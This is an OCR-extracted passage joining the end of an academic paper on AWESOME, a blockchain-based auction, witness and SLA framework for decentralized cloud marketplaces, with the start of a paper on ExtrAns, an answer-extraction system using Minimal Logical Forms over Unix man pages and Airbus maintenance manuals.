for the claimed cloud resources. In the blockchain community, the bridge between on-chain and off-chain events is called "oracle" [5]. One of the solutions to build this bridge is to retrieve data from Oraclize\(^2\), a third-party company performing as a trusted data source for the blockchain. However, this solution suffers from a single point of failure (SPOF) and needs extra commission fees. In this case, a decentralized and trustworthy witness mechanism is needed to judge SLA violations that occur off-chain. This paper expects to enhance the trustworthiness of cloud auction and SLA by introducing a novel Auction and Witness Enhanced decentralized trustworthiness SLA for Open, decentralized service MarkEtplaces (AWESOME) framework. Specifically, a new role called the witness is involved in the entire cloud service trading process, shown in Figure 1. The decentralized blockchain users can join the SLA judgment and work as witnesses through a carefully designed incentive mechanism that motivates witnesses to make effective judgments to win profits. In the rest of this paper, we first demonstrate the current requirements and related works in building a decentralized cloud marketplace in Section 2. Two industrial use cases summarize these requirements and challenges. Then, to address these challenges, we propose the AWESOME framework and present the detailed architecture overview and technical details in Section 3. Next, Section 4 shows a proof of concept to demonstrate the feasibility of the AWESOME framework. Finally, We conclude the entire paper in Section 5. 2 REQUIREMENTS AND RELATED WORK In industrial innovations (e.g., crowd journalism and smart transportation) and scientific applications (e.g., research data management and disaster early warning), cloud services are playing an increasingly important role in real-time processing information (e.g., multimedia acquired by mobile devices), running simulations (e.g., for predicting possible disasters) and for enabling extensive scale collaborations (e.g., for running distributed scientific workflows). Therefore, it is necessary to employ multiple data centers or providers to handle decentralized collaboration between data and resource providers and customers in several industrial use cases. (1) Use case 1. Decentralized cloud marketplace for social media (taken from EU ARTICONF project): crowd journalism for real-time news reporting during live sports, music events, or natural disasters. Individual citizen journalists make photos or videos of the "news" and trade them via the news platform. The system has to detect fake news from those crowdsourced content by running real-time processing in a decentralized cloud service marketplace for those media contents, or engage human experts to review them. (2) Use case 2. Decentralized service marketplace for medical data management (taken from EU CLARIFY project): sharing and utilizing pathology data provided by hospitals or individuals from different countries, where various medical data access constraints are often applied. When a machine learning application for studying breast cancer must use data from multiple hospitals, the application developer has to select cloud providers from a decentralized marketplace that meet the application needs (e.g., geolocation, capacity, and price). We can therefore highlight the following requirements and challenges from those use cases: - Provider selection, service customization, and capacity planning challenges. The developer has to select cloud services from different providers (very often multiple ones) due to distributed data locations (e.g., sensors or repositories), diverse data access constraints (e.g., for medical data), performance constraints (e.g., for real-time decisions in early warning). The various price and reputation models make the selection time-consuming and challenging to be optimal. - SLA interoperability and guarantee challenge. The time-critical application constraints, e.g., for processing media contents during crowd news reporting and real-time decision-making, require the profound optimization of the application logic and components and the guarantee of the service quality of the cloud infrastructure, including both virtual machines and network connectivities. The diverse SLA terms among providers and the uncertainties in the SLA guarantee make performance optimization difficult. \(^2\)http://www.oraclize.it/ • Difficulties in verifying the incentive models and setting of the witness games in a decentralized marketplace. The business logic in a decentralized marketplace is often realized by smart contracts, which are supposed to be immutable after being deployed on blockchains. However, any careless design or mistake may cause unexpected loss. • Virtual infrastructure automation challenge. When an application involves multi providers or data centers, the provisioning of the virtual infrastructure, deployment of the software platform and application components (often in terms of containers), monitoring, and adaptation of the application need to be ideally automated. However, the diverse Application Programming Interfaces (APIs) from different providers and the interoperability issues across those providers make the automated provisioning and deployment a challenge and result in high complexity for monitoring the runtime infrastructure quality and detecting SLA violations and adaptation of the infrastructure. There are already many tools and academic studies focused on the challenges listed above. For example, Cloudsstorm [11] addresses DevOps resource management from the perspective of improving application programmability. BASIC [4] is an Ethereum blockchain-based urban agent simulator. It combines agent-based simulation with smart contract technology to verify the feasibility of using blockchain in simulated urban scenarios. By contrast, the authors in [10] and [1] use different auction models to achieve optimal cloud provider selection. While blockchain-based auction models have great potential for the cloud marketplace, most existing solutions focus only on the design of the auction models without considering the trusted execution of cloud SLAs. Although there are tools existing in different areas for different purposes (e.g., cloud/blockchain automation, DevOps, and blockchain simulation), there is no such a package solution to build a decentralized cloud marketplace and meet users’ various application needs. 3 THE AWESOME FRAMEWORK To tackle the current challenges in the decentralized cloud marketplace, we propose the AWESOME framework. The AWESOME software architecture consists of novel combinations of state-of-the-art technologies in DevOps, agent-based modeling, game theory, and blockchain. The proposal aims to tackle those challenges and to achieve the following objectives: • Objective 1: Improve the provider selection in a decentralized ecosystem by developing an automated service auction framework to enable dynamic business relations between a consumer(s) and providers and establish an SLA. • Objective 2: Improve the service quality and SLA’s trustworthiness between consumer(s) and providers by establishing a decentralized dynamic witness mechanism to monitor the quality violations and automate the procedure for SLA compensation and payment. • Objective 3: Improving the efficiency of smart contract validation by developing social behavior-based simulation components to evaluate and validate the impact of smart contracts for auctions and witnesses. • Objective 4: Improve the continuous DevOps efficiency of an application in a decentralized cloud ecosystem by providing an integrated software framework to enhance the infrastructure management components in the existing DevOps stack. The AWESOME framework will be tested on both permissionless and permissioned blockchains. 3.1 Architecture Overview The AWESOME framework consists of four subsystems in response to the proposed objectives, as shown in Figure 2: (1) The Interactive Business Scenario guided Smart Contract SIMulator (IBSCSIM) provides a smart contract business process simulation environment that connects both on-chain and off-chain activities. It aims to verify the feasibility of using blockchain in different use case scenarios (e.g., crowd journalism and pathology data sharing) through agent-based simulation by considering the communication among different smart contracts agents. More specifically, IBSCSIM designs simulation scenarios regarding 1) performance issues, 2) smart contract security issues, and 3) incentive model selection to provide users with overall DevOps guidance. (2) On-Demand Auction for Service Providers (ODASP) provides an auction-based service provider selection solution. This subsystem will first diagnose the use case requirements and then select the most suitable auction model and algorithm to achieve the effectiveness of the auction process. The management of the auction process and the enforcement of the service fee payment (in the form of cryptocurrency) are all executed on the blockchain, ensuring that the whole auction is open and trustworthy. Finally, ODASP also audits bidder candidates to ensure that malicious providers cannot join the auction process. (3) Decentralized Customizable Witness Game (DCWG) provides a game theory-based incentive framework to manage decentralized auction witnesses. First of all, an appropriate number of witness candidates will be selected in an unbiased way to perform off-chain monitoring of federated Cloud SLAs. DCWG will then design a game theory incentive mechanism (e.g., different payoff functions) to enable selected witnesses to make correct judgments to win more profits. The subsystem will also audit the witnesses’ reputations to reward/restrict their participation in future monitoring activities. (4) Decentralized Automated Service Orchestration (DASO) provides tools and APIs for application developers to set the necessary blockchain infrastructures. More specifically, it is responsible for automating the process of planning, provisioning blockchain infrastructure, and the generation and deployment of business/SLA smart contracts. The DASO subsystem also monitors and diagnoses smart contracts and the underlying blockchain infrastructure at runtime to provide effective adaptation. ### 3.2 Technical Details As shown in Figure 3, the overall workflow of the AWESOME framework can be described as the following steps. First of all, a **AWESOME manager** calls the DASO subsystem to plan and provision the blockchain infrastructure required for the simulation. The **AWESOME end user** then calls the IBSCSIM subsystem to initiate an agent-based on-chain simulation for the current use case. After that, IBSCSIM starts to simulate offline behaviors and generate on-chain predictions, which provides users with guidance on auction and witness settings in ODASP and DCWG. Meanwhile, the DASO subsystem automatically generates auction, witness, and SLA smart contracts to ensure trustworthy interaction between different participants. Next, the decentralized **service providers** and **witnesses** are registered in the ODASP and DCWG subsystems, respectively. When there are enough registered candidates, the **AWESOME manager** and the **AWESOME auctioneer** start the auction screening process to find qualified providers and witnesses. Finally, the **selected providers** collaborate to provide federated cloud services, and **witnesses** start to monitor the SLA to win profits. When the cloud service ends, the service price and witness fee will be paid and enforced with cryptocurrency using blockchain. In the entire AWESOME workflow, IBSCSIM guides the selection of auction and witness game models and the on-chain deployment of the use case. ODASP selects candidate providers through an 4 PROOF OF CONCEPT VALIDATION In this section, we present the proof of concept validation of the AWESOME framework to demonstrate its feasibility. To meet the requirements of building a decentralized cloud marketplace, we designed three smart contracts using Ethereum blockchain (i.e., auction contract, witness contract, and SLA contract) to support trustworthy and fair interactions between different stakeholders. In the AWESOME framework, we leverage a smart contract factory to manage and generate subcontracts instead of developing different contracts separately, as this is a more secure and efficient way. 4.1 Smart Contract Interactions The sequence diagram below shows the interaction between the contract factory and the different subcontracts. First, an AWESOME manager calls the contract factory to create a new auction contract. Next, an auction contract with a customized auction rule for the business requirements is built to support transparency and automation of the auction process. In this case, decentralized service providers can register and submit their bids for services using commitments on the blockchain. The auction contract then selects the winning providers based on the highest k bids and generates k SLA contracts for each provider. When the auction is settled (note that the services have not been delivered yet), the AWESOME manager calls the contract factory again to generate a witness contract that contains customized incentive mechanisms to encourage truth-telling witnesses. More details about a game theory based witness payoffs design are mentioned in our previous research [12]. Then, different winner providers can start to deliver cloud services off-chain, while the witnesses start to monitor all the services; if the QoS satisfies the requirements in the SLA contract, there is no violation; otherwise, there is a violation. The result of service monitoring is also returned to the auction contract and determines the status of the auction. 4.2 Cost Analysis Regarding the implementation details of AWESOME contracts, we first designed some function interfaces in eachsmart contract, as shown in Table 1. These functions have built-in access control mechanisms; only specific stakeholder groups can access and call them. Next, we measured the transaction fee (ether) of each function interface, as shown in Figure 5. Specifically, three transaction submission modes (i.e., Low, Average, and High) were tested. By analyzing the testing results, we can find that the transaction fees of most function interfaces are maintained at a relatively low level (less than 0.01 ether), except for only three special cases, namely Place Bids (auction contract), Generate SLA Contracts (auction contract), and Calculate Witness Fee (witness contract). These function Table 1: The Gas Consumption of Each Function Interface in AWESOME Smart Contracts <table> <thead> <tr> <th>Smart Contract</th> <th>Access Control</th> <th>Function Interface</th> <th>Gas Consumption</th> </tr> </thead> <tbody> <tr> <td><strong>Auction Contract</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Customer</td> <td>Setup Auction</td> <td>171707</td> <td></td> </tr> <tr> <td>Provider</td> <td>Bidder Register</td> <td>87310</td> <td></td> </tr> <tr> <td>Provider</td> <td>Submit Bids</td> <td>134473</td> <td></td> </tr> <tr> <td>Provider</td> <td>Reveal Bids</td> <td>110190</td> <td></td> </tr> <tr> <td>Customer</td> <td>Place Bids</td> <td>435951</td> <td></td> </tr> <tr> <td>Customer</td> <td>Withdraw Deposit</td> <td>44185</td> <td></td> </tr> <tr> <td>Customer</td> <td>Generate SLA Contracts</td> <td>997266</td> <td></td> </tr> <tr> <td><strong>Witness Contract</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>Witness</td> <td>Witness Register</td> <td>172679</td> <td></td> </tr> <tr> <td>Witness</td> <td>Submit Reports</td> <td>110992</td> <td></td> </tr> <tr> <td>Witness</td> <td>Reveal Reports</td> <td>150549</td> <td></td> </tr> <tr> <td>Customer</td> <td>Calculate Witness Fee</td> <td>1108723</td> <td></td> </tr> <tr> <td>Witness</td> <td>Withdraw Witness Fee</td> <td>22468</td> <td></td> </tr> <tr> <td>Customer</td> <td>Check Auction Settled</td> <td>49571</td> <td></td> </tr> <tr> <td>Provider</td> <td>Set Customer</td> <td>44074</td> <td></td> </tr> <tr> <td>Provider</td> <td>Set Service Duration</td> <td>27266</td> <td></td> </tr> <tr> <td>Provider</td> <td>Publish Service</td> <td>34587</td> <td></td> </tr> <tr> <td>Provider</td> <td>Setup SLA</td> <td>55275</td> <td></td> </tr> <tr> <td>Customer</td> <td>Accept SLA</td> <td>71536</td> <td></td> </tr> <tr> <td>Provider</td> <td>Cancel SLA</td> <td>26202</td> <td></td> </tr> </tbody> </table> Note that in reality, different auction models have different rules. In this section, a reverse first-price sealed-bid auction (FPSBA) model is used as an example to illustrate the AWESOME framework workflow. Other auction models can be easily integrated on the smart contract. The estimated transaction confirmation duration for three modes are 16 minutes, 2 minutes and 19 seconds, and 30 seconds, respectively. Data was collected on April 30, 2021 at https://etherscan.io/gastracker. It is worth noticing that the AWESOME framework aims to develop highly modular software architecture for a decentralized cloud ecosystem. Some subsystem features (e.g., the cross-chain simulator in IBSCSIM and blockchain planner in DSLA) are still under development. We leave this development job as part of our future work. In the future, we will continue to test our framework and demonstrate its feasibility in two ongoing industrial projects (i.e., EU ARTICONF and CLARIFY). ACKNOWLEDGMENTS This work has been partially funded by the European Union’s Horizon 2020 research and innovation programme, by the ARTICONF project grant agreement No 825134, by the ENVRI-FAIR project grant agreement No 824068, by the BLUECLOUD project grant agreement No 862409, by the LifeWatch ERIC. The project is also partially supported by China Scholarship Council (CSC). REFERENCES
{"Source-Url": "https://pure.uva.nl/ws/files/70612822/BANDIT2021_3_.pdf", "len_cl100k_base": 5053, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 21996, "total-output-tokens": 6122, "length": "2e12", "weborganizer": {"__label__adult": 0.00046324729919433594, "__label__art_design": 0.0005755424499511719, "__label__crime_law": 0.0009236335754394532, "__label__education_jobs": 0.0011796951293945312, "__label__entertainment": 0.00017690658569335938, "__label__fashion_beauty": 0.00025963783264160156, "__label__finance_business": 0.007457733154296875, "__label__food_dining": 0.0005216598510742188, "__label__games": 0.001247406005859375, "__label__hardware": 0.001514434814453125, "__label__health": 0.0012369155883789062, "__label__history": 0.0005402565002441406, "__label__home_hobbies": 0.0001856088638305664, "__label__industrial": 0.0009508132934570312, "__label__literature": 0.0004482269287109375, "__label__politics": 0.0007386207580566406, "__label__religion": 0.0004837512969970703, "__label__science_tech": 0.32568359375, "__label__social_life": 0.00017201900482177734, "__label__software": 0.038421630859375, "__label__software_dev": 0.615234375, "__label__sports_fitness": 0.0003285408020019531, "__label__transportation": 0.0008401870727539062, "__label__travel": 0.0003273487091064453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26923, 0.06977]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26923, 0.10309]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26923, 0.8871]], "google_gemma-3-12b-it_contains_pii": [[0, 1534, false], [1534, 6510, null], [6510, 11560, null], [11560, 16510, null], [16510, 18998, null], [18998, 23332, null], [23332, 26923, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1534, true], [1534, 6510, null], [6510, 11560, null], [11560, 16510, null], [16510, 18998, null], [18998, 23332, null], [23332, 26923, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26923, null]], "pdf_page_numbers": [[0, 1534, 1], [1534, 6510, 2], [6510, 11560, 3], [11560, 16510, 4], [16510, 18998, 5], [18998, 23332, 6], [23332, 26923, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26923, 0.17164]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
0888916ae223c65d08f92bab9bf0bf1afb7b9a92
Towards answer extraction: an application to technical domains Rinaldi, Fabio; Dowdall, J; Hess, M; Mollà Aliod, D; Schwitter, R Abstract: The shortcomings of traditional Information Retrieval are most evident when users require exact information rather than relevant documents. This practical need is pushing the research community towards systems that can exactly pinpoint those parts of documents that contain the information requested. Answer Extraction (AE) systems aim to satisfy this need. This paper presents one such system (ExtrAns) which works by transforming documents and queries into a semantic representation called Minimal Logical Form (MLF) and derives the answers by logical proof from the documents. MLFs use underspecification to overcome the problems associated with a complete semantic representation and offer the possibility of monotonic, non-destructive extension. Towards Answer Extraction: An Application to Technical Domains Fabio Rinaldi* and James Dowdall* and Michael Hess* and Diego Mollᆠand Rolf Schwitter† Abstract. The shortcomings of traditional Information Retrieval are most evident when users require exact information rather than relevant documents. This practical need is pushing the research community towards systems that can exactly pinpoint those parts of documents that contain the information requested. Answer Extraction (AE) systems aim to satisfy this need. This paper presents one such system (ExtrAns) which works by transforming documents and queries into a semantic representation called Minimal Logical Form (MLF) and derives the answers by logical proof from the documents. MLFs use underspecification to overcome the problems associated with a complete semantic representation and offer the possibility of monotonic, non-destructive extension. 1 Introduction The classical type of ‘information need’ solved by existing Information Retrieval (IR) applications has a number of shortcomings which new techniques such as Information Extraction and Answer Extraction aim at solving. Traditionally, it is assumed that IR systems have to find supporting documents on a particular topic and the problem of locating the relevant information within those documents is not dealt with. In fact, many authors have observed that traditional Information Retrieval should rather be called “Document Retrieval”. The typical scenario application for IR techniques could be considered that of “Essay Writing”, while the new approaches aim at a different scenario which could be called “Problem Solving”. Recently, some sections of the research community have focused their interest on systems which can not only locate relevant documents, but also pinpoint the exact piece of information that the user is interested in. During the past decade the Message Understanding Conferences have been a major arena for development in this field. The concept of Information Extraction has been gradually developed and refined so that today this is considered a separate and autonomous area of research. Typically such system can extract specific types of information predefined by the creators of the system. The simpler applications, like Named Entity extraction, have enjoyed considerable success. More complex applications, like template extraction and scenario extraction did not seem capable of improving significantly after reaching levels which were deemed interesting but not fully satisfactory. A fundamental problem with Information Extraction applications of the complex type (Template Extraction, Scenario Extraction) is that the system is normally tailored to the predefined templates and cannot easily adapt to different templates as would normally be required by a change of domain or the specific interests of the users (as defined by the templates). Answer Extraction (also called Question Answering, or QA) is a recently developed field, which tries to solve some of the problems described above. Answer Extraction systems typically allow the user to ask arbitrary questions and aim at retrieving, in a given corpus, a small snippet of text which provides an answer. Research in this area has been promoted in the past couple of years by, in particular, the QA track of the TREC competitions [18, 21]. The participants in this competition have the opportunity to measure how well their systems can retrieve answers to a predefined set of questions from a very large collection of documents. They run their system on the given questions and return for each a ranked list of five answers in the form of pairs [document identifier, answer string]. The returned data are then evaluated by human assessors, who for each string have to decide whether it contains an answer to the question and whether the given document supports that answer. One of the limitations of such evaluations has been that questions about rule-like or definitional knowledge (i.e. generic, intensional questions), such as “How do you stop a Diesel engine?” or “How does a Diesel engine work?” or “What is a typhoon?” have not received much attention so far.1 In fact, it is precisely this type of question that users would direct at technical documents. Besides there has been a strong focus on very large volumes of text, as typically seen in IR applications. In our own research we prefer to concentrate on “low volume/high value” data, with a gradual increase in volumes to follow later. In this paper we present an Answer Extraction (AE) system (section 2) and its application to two different domains. After describing in detail the syntactic (section 3) and semantic (section 4) processing components of the system, we will show how Answer Extraction is performed (section 5) and describe a comparison with a baseline IR system (section 6). Finally, we discuss the results and briefly survey related work (section 7). 1 While only a small number of them were included in QA track of TREC 8 and 9, in the most recent TREC 10 a significant number has been included. * University of Zurich, Institute of Computational Linguistics, Winterthurerstrasse 190, CH-8057 Zurich, Switzerland. Email: {rinaldi, hess, dowdall}@ifi.unizh.ch † Department of Computing, Macquarie University, Sydney, Australia. Email: {diego, rolfa}@ics.mq.edu.au 2 The Architecture of ExtrAns ExtrAns is a complex system which comprises several different modules (see figure 1), written in different programming languages. A given document collection is processed in an off-line stage, but the query is processed on-line. The same linguistic analysis is applied in both stages, transforming everything into a semantic representation called Minimal Logical Form (MLF). The basic architecture has been tested over two contrasting technical domains. Originally, answers to arbitrary user questions were extracted from the Unix documentation files (“man pages”). The system covers a set of more than 500 unedited man pages, and answers questions such as “which command can duplicate files?” The flexibility of the MLFs allows the extraction of relevant answers (“cp does not copy a file onto itself”), not only strictly logical answers (“cp copies files”). The system can be tested on the project web page.7 More recently, the system has been used over the Airplane Maintenance Manuals (AMM) of the Airbus A320. The highly technical nature of this domain as well as an SGML-based format and a much larger size (120MB) than the Unix documentation, provided an important test-bed for the scalability and domain independence of the system. Compared to the QA track of TREC these two domains represent small to medium sized document collections. An obvious advantage is the opportunity to process the entire document collection, rather than just selected paragraphs, in an off-line stage. As the data sets continue to grow in size this approach will quickly become too computationally expensive and paragraph indexing methodologies will need to be used. Currently, there is a paragraph selection procedure based on a loose matching between query concepts and the stored semantic representation of the document. User queries are processed on-line and converted into MLFs (possibly expanded by synonyms) and proved by refutation over the document knowledge base. Pointers to the original text attached to the retrieved logical forms allow the system to identify and highlight those words in the retrieved sentence that contribute most to that particular answer [14]. An example of the output of ExtrAns can be seen in figure 3. When the user clicks on one of the answers provided, the corresponding document is displayed with the relevant passages highlighted. When no direct proof for the user query is found (strict mode), the system is capable of relaxing the proof criteria in a stepwise manner. First, hyponyms will be added to the query terms, thus making the query more general but still logically correct. If that fails, the system will attempt approximate matching, in which the sentence with the highest overlap of predicates with the query is retrieved. The (partially) matching sentences are scored and the best fits are returned. In the case that even this method does not find sufficient answers the system will attempt keyword matching, in which syntactic criteria are abandoned and only information about word classes is used. This last step corresponds approximately to a traditional passage-retrieval methodology with consideration of the POS tags. It is important to note that, in the strict mode, the system finds only logically correct proofs (within the limits of what MLFs can represent; see below), i.e. it is a “high precision” AE system. 3 Syntactic Processing The syntactic analysis uses the robust dependency-based parser Link Grammar (LG) [16], which is able to handle a wide range of syntactic structures [17]. Syntactically unresolvable ambiguities, such as prepositional phrase attachment or gerund and infinitive constructions, are treated with a corpus-based approach [2]. Sentence-internal pronouns are dealt with using the anaphora resolution algorithm [11]. LG uses linkages to describe the syntactic structure of a sentence (see figure 2). Links connect pairs of words in such a way that the requirements of each word described in the sentences are satisfied, that the links do not cross, and that the words form a connected graph. Despite some extensions at the lexical and syntactic level, processing the frequent occurrences of multi-word, domain specific terminology proved problematic for LG. The addition of a new module, capable of identifying these previously detected terms, ensures they are parsed as single syntactic units. This reduces the complexity of parsing the AMM, by as much as 50%. Also, the output of LG has 7 http://www.ifi.unizh.ch/cl/extrans/ Figure 2. An example of LG output Figure 3. An example of the output of ExtrAns - query window been extended to include the direction of the linkages as this information is vital for anaphora resolution and semantic analysis. As LG returns all possible parses, it is necessary to disambiguate among them [13]. The two possibilities for the prepositional phrase attachment returned in figure 2, will be reduced to (b) by the disambiguator as this linkage correctly identifies the dependency relations. The link \( \text{\textit{to}} \) connects the subject \( \text{\textit{coax}} \) to the wall. The wall functions as a dummy word at the beginning of every sentence and has linking requirements like any other word. \( \text{\textit{to}} \textit{editor} \) connects the transitive verb \( \textit{connects} \) with the subject on the left, the verbal head on the right. The transitive verb and its direct object \( \textit{external antenna} \), that acts as the head of a noun phrase, are connected by the \( \text{\textit{o}} \textit{2} \) link. \( \text{\textit{to}} \) connects the verb to the modifying prepositional phrase. Finally, the link \( \text{\textit{to}} \textit{editor} \) connects the transitive verb \( \text{\textit{connects}} \) to its object \( \textit{ANT connection} \). These dependency relations are used to generate the semantic representation of the sentence. LG has a robust component, parsing complex or ungrammatical structures, so that ExtrAns may still produce MLFs, extended with special predicates that mark the unprocessed words as “keywords”. Sentences that contain nominalizations are dealt with using a small hand-crafted resource (lexicon of nominalizations) \(^3\) which helps us to cope with the most important cases, e.g. “to edit <a text>” \( \Leftrightarrow \) “editor of <a text>” \( \Leftrightarrow \) “<text> editor”. The system also includes hyponymy and synonymy relations based on the WordNet model. 4 Semantic Analysis The Minimal Logical Forms (MLFs) of the documents and queries are the fundamental expression of their meaning within ExtrAns. The generation of MLFs is robust enough to treat very complex (even ungrammatical) sentences [14], and facilitates the semantic comparison of queries against documents. MLFs represent a powerful combination of selected reification and underspecification. An important facet of the MLFs results from the flat expressions produced through reification, as proposed for instance in [9] or [5]. Where Hobb’s ontologically promiscuous semantics reifies each predicate, MLFs restrict reification to only certain predicates: Objects, eventualities (events or states) and properties. In this way event modifiers, negations, higher order verbs, conditionals and higher order predicates can be represented. MLFs use the main syntactic dependencies between words to express verb-argument relations, as well as modifier and adjunct relations. Extensive underspecification excludes complex quantification, tense and aspect, temporal relations, plurality and modality. One of the effects of this kind of underspecification is that several natural language queries, although slightly different in meaning, produce the same logical form. The MLFs are expressed as conjunctions of predicates with all the variables existentially bound with wide scope. For example, the MLF of the sentence “A coax cable connects the external antenna to the ANT connection” is: \[ \begin{align*} \text{(1)} & \quad \text{holds(\textit{o1}),} \\ & \quad \text{object(\textit{coax}, \textit{o2}, \{v3\}),} \\ & \quad \text{object(\textit{external antenna}, \textit{o3}, \{v4\}),} \\ & \quad \text{object(\textit{ANT connection}, \textit{o4}, \{v5\}),} \\ & \quad \text{evt(\textit{connect}, \textit{o1}, \{v3, v4\}),} \\ & \quad \text{prop(to, \textit{p1}, \{\textit{o1}, v5\}),} \end{align*} \] ExtrAns identifies three multi-word terms, translated into (1) as the objects: \( v3 \), a \( \textit{coax cable} \), \( v4 \) an \( \textit{external antenna} \) and \( v5 \) an \( \textit{ANT connection} \). The entity \( \textit{o1} \) represents the ‘connect’ event involving two arguments, the \( \textit{coax cable} \) and the \( \textit{external antenna} \). This reified event, \( \textit{o1} \), is used again in the final clause to assert the event happens ‘to’ \( v5 \) (the \( \textit{ANT connection} \)). This is the utility of reification: yielding the additional arguments \( o2, o3, o4 \) and \( o1 \) as hooks for additional modifiers to be attached to the entities they denote. Reification can be used to monotonically increment the underspecified MLF (1), without embedding arguments (preserving a flat structure), or destructively rewriting the original MLF. For example, the expression “A coax cable \( \textit{securely connects} \) the external antenna to the \( \textit{ANT connection} \)” changes nothing in the original MLF, but additionally asserts: \( \text{\textit{prop}}(\textit{securely}, \textit{p8}, \textit{o1}) \), that the event \( \textit{o1} \) is \( \textit{secure} \). (1) only exploits the reified event but other, more complex sentences will need to refer to reified \( \textit{objects} \) (non-interactive adjectives) or reified \( \textit{properties} \) (adjective modifying adverbs). 5 Answer Extraction ExtrAns finds the answers to the questions by forming the MLFs of the questions and then running Prolog’s default resolution mechanism to find those MLFs that can prove the question. The logical form of the question “How is the external antenna connected ?” is: \[ \begin{align*} \text{(2)} & \quad \text{holds(\textit{v1}),} \\ & \quad \text{object(\textit{external antenna}, \textit{o2}, \{v5\}),} \\ & \quad \text{evt(\textit{connect}, \textit{v1}, \{v4, v5\}),} \\ & \quad \text{object(\textit{anonymous object}, \textit{v3}, \{v4\}).} \end{align*} \] The variables introduced in a question MLF are converted into Prolog variables. The resulting MLF can be run as a Prolog query that will succeed provided that there has been an assertion in the text that the \( \textit{external antenna} \) is connected to or by \( \textit{something} \). This \( \textit{something} \) is the anonymous object of the query. A sentence identifier and a pointer (indicating the tokens from which the predicate has been derived) are attached to each predicate of a MLF in the knowledge base. This information matches against additional variables attached to the predicates in the question (not shown in the example above) and is eventually used to highlight the answer in the context of the document (see figure 3). The use of Prolog resolution will find the answers that can logically prove the question, but given that the MLFs are simplified logical forms converted into flat structures, ExtrAns will find sentences that, logically speaking, may not be exact answers but are still relevant to the user’s question, such as: \[ \begin{align*} \text{(3)} & \quad \text{a “The external antenna must not be directly connected to the control panel.”} \\ & \quad \text{b “Do not connect the external antenna before it is grounded.”} \\ & \quad \text{c “The external antenna is connected, with a coax cable, to the ANT connection on the ELT transmitter.”} \\ & \quad \text{d “To connect the external antenna use a coax cable.”} \end{align*} \] The expressivity of the MLF is expanded through the use of meaning postulates of the type: \( \text{If } x \text{ is } \textit{installed in } y, \text{ then } x \text{ is } \textit{in } y \). This ensures that the query “Where are the equipment and furnishings ?”, extracts the answer “The equipment and furnishings are installed in the cockpit”. In our view MLFs open up a potential path to a stepwise development of a question answering system by allowing monotonically incremental refinements of the representation without the need to destroy previous partial information. While MLFs specify the core meaning of sentences they leave underspecified those aspects of semantics that are less relevant or too hard to analyse, for the time being. 6 Evaluation In order to set up an evaluation framework for our system, we decided to consider an IR system as a baseline, even if the standard measures of precision and recall are not ideal for an Answer Extraction system. In particular recall is significantly less important than precision, as the aim of such a system is to provide (at least) one correct answer, rather than all the possible answers in a given collection. In the QA track of TREC a measure of precision that is commonly used is the Mean Reciprocal Rank (MRR). The Rank of a given result is the position in which the first correct answer is found in the output list of the system. Over a given set of answers MRR is computed as the mean of the reciprocals of the ranks for all the answers. The particular evaluation that we present here is targeted at the new application in the AMM domain. We devised 100 questions by selecting interesting passages from the manual and formulating questions of which those passages could be an answer. The questions were submitted to both ExtrAns and the selected IR system (SMART). While in general ExtrAns retrieves a short number of answers, that can be easily checked manually, SMART retrieves a ranked list of documents. As manual inspection of all the documents retrieved by SMART would be impossible, we decided to set an arbitrary threshold (at 10), i.e. if no valid answer was contained in the first ten retrieved documents, we classified it as “Not Found”. The diagram (figure 5) shows how many answers are found at each rank (1 to 5, answers from 6 to 10 are considered together). As it can be seen ExtrAns finds fewer answers than SMART (even ruling out all answers ranked > 10). Therefore recall would clearly be higher for SMART. However in the majority of cases, when ExtrAns does not find the answer, it places it in the first position. Notice further that in some cases ExtrAns finds more than one valid answer for the same question (possibly in the same document). There are very few cases where an answer at a lower rank is correct while answers at higher ranks for the same question are not. It does happen that ExtrAns retrieves incorrect answers together with the correct one, but in that case the correct one is almost always ranked first. For the particular evaluation that we have presented our system would obtain a MRR of 0.63, which is a very good result if compared with results obtained in TREC. However we should stress that such a comparison is misleading, as our evaluation is far more restricted than those carried out in TREC. Besides, our system at the moment could not cope with very large volumes of data as seen in TREC. In general, this evaluation leads us to conclude that ExtrAns can provide far higher precision than a generic IR system, at the price of a smaller recall. Recall alone however is not interesting. In the scenario that we consider it is important to locate quickly the precise answer. Relevant documents that are ranked poorly are likely to remain unnoticed by the user. 7 Discussion IR techniques can be used to implement QA systems, by applying them at the passage or sentence level. Portions of text with the maxi- --- 4 We presented in [15] a different type of evaluation performed on the original application for the Unix man pages. mum overlap of question terms contain, with a certain probability, an answer. Standard preprocessing steps (removing stop words, “stemming” word forms, weighting keywords etc.) can be used to refine this basic method. However, systems that do not employ linguistic processing techniques and stick to the “bag of words” approach inherited from IR will never be able to distinguish different strings that contain the same words in different syntactic configurations and that therefore encode different meanings, such as “absence of evidence” and “evidence of absence”. Results from the two first TREC QA tracks [19, 21] showed clearly that traditional IR techniques are not sufficient for satisfactory Question Answering. When the answer is restricted to a very small window of text (50 bytes) systems that relied only on those techniques fared significantly worse than systems that employed some 